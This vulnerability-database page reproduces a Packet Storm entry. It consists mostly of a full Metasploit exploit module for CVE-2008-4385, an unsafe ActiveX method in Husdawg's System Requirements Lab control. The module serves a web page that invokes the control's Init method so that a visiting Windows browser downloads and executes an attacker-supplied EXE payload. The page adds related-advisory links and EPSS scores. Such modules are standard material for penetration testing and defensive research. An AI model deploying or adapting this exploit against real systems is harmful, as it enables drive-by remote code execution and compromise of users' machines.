Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:83118
HistoryNov 26, 2009 - 12:00 a.m.

Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method

2009-11-2600:00:00
MC
packetstormsecurity.com
21

EPSS

0.737

Percentile

98.2%

JSON
`##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method',  
'Description' => %q{  
This module allows attackers to execute code via an unsafe method in  
Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)   
},  
'License' => 'MSF_LICENSE',  
'Author' => [ 'MC' ],  
'Version' => '$Revision$',  
'References' =>   
[  
[ 'CVE', '2008-4385' ],  
[ 'OSVDB', '50122' ],  
[ 'US-CERT-VU', '166651' ],  
],  
'Payload' =>  
{  
'Space' => 2048,  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DefaultTarget' => 0))  
  
end  
  
def autofilter  
false  
end  
  
def check_dependencies  
use_zlib  
end  
  
def on_request_uri(cli, request)  
  
payload_url = "http://"  
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']  
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"  
  
if (request.uri.match(/payload/))  
return if ((p = regenerate_payload(cli)) == nil)  
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)  
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")  
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })  
return  
end  
  
vname = rand_text_alpha(rand(100) + 1)  
exe = rand_text_alpha(rand(20) + 1)  
  
content = %Q|  
<html>  
<object classid='clsid:67A5F8DC-1A4B-4D66-9F24-A704AD929EEE' id='#{vname}'></object>  
<script language='JavaScript'>  
#{vname}.Init("#{payload_url}/#{exe}.exe", "#{vname}");  
</script>  
</html>  
|  
  
content = Rex::Text.randomize_space(content)  
  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
  
send_response_html(cli, content)  
  
handler(cli)  
  
end  
  
end  
`

Related

seebug 1
prion 1
cvelist 1
exploitdb 1
cert 1
metasploit 1
cve 1
nessus 1
nvd 1
seebug
seebug
Instant Expert Analysis ActiveXζŽ§δ»Άδ»»ζ„δ»£η δΈ‹θ½½ε’Œζ‰§θ‘ŒζΌζ΄ž
2008-10-20 00:00:00
prion
prion
Authentication flaw
2008-10-14 21:10:00
cvelist
cvelist
CVE-2008-4385
2008-10-14 20:00:00
exploitdb
exploitdb
Husdawg, LLC. System Requirements Lab - ActiveX Unsafe Method (Metasploit)
2010-09-20 00:00:00
cert
cert
Husdawg, LLC Systems Requirements Lab ActiveX control and Java applet vulnerable to arbitrary code download and execution
2008-10-14 00:00:00
metasploit
metasploit
Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
2008-10-14 19:19:39
cve
cve
CVE-2008-4385
2008-10-14 21:10:35
nessus
nessus
Husdawg System Requirements Lab Multiple ActiveX Remote Code Execution
2008-10-25 00:00:00
nvd
nvd
CVE-2008-4385
2008-10-14 21:10:35

EPSS

0.737

Percentile

98.2%

JSON
Related for PACKETSTORM:83118
seebug1prion1cvelist1exploitdb1cert1metasploit1cve1nessus1nvd1